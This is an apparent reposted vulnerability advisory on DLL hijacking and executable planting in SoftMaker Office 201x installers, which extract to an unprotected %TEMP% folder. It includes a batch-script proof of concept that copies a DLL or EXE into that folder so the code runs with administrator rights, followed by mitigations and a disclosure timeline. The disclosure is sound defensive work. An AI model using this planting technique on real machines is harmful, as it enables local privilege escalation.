SoftMaker Office 201x Privilege Escalation

Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

Hi @ll, the service pack installers for SoftMaker Office 201x, available from <>, are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe". "%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. allows full access for the UNPRIVILEGED user. For this well-known vulnerability see <> and <> Due to the embedded application manifest which specifies "requireAdministrator" the executable installer can only be run with administrative rights. JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users! The UNPRIVILEGED user as well as any program running with the users credentials can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege. Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See <>, <>, <> <>, <> and <> plus <> Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege! Proof-of-concept: ~~~~~~~~~~~~~~~~~ 0. download <> and save it in an arbitrary directory; 1. download <> (see <> alias <>) and save it in an(other) arbitrary directory; 2. save the following batch script in same the directory as SENTINEL.DLL: --- OFW16_873.CMD --- :WAIT @If Not Exist "%TEMP%\7z*" Goto :WAIT For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%! Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL" Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL" Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV" --- EOF --- 3. start the batch script; 4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL. PWNED! 5. download <> to the same directory as the batch script; 6. in the batch script replace the 3 lines Copy ... with Copy "SENTINEL.EXE" "%foobar%\spsetup.exe" 7. start the batch script; 8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE. PWNED! Mitigations: ~~~~~~~~~~~~ * Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See <> and <> plus <!execute.html> alias <!execute.html> for more information. * Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup which use the same "%TEMP%" for unprivileged and privileged processes! * Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use <> to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories". stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2016-12-15 sent vulnerability report to vendor no reply, not even an acknowledegement of receipt 2016-12-23 resent vulnerability report to vendor, cc CERT at german BSI no reply, not even an acknowledegement of receipt 2016-12-27 CERT at german BSI contacts vendor offering help no reply, not even an acknowledegement of receipt 2016-12-31 report published

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top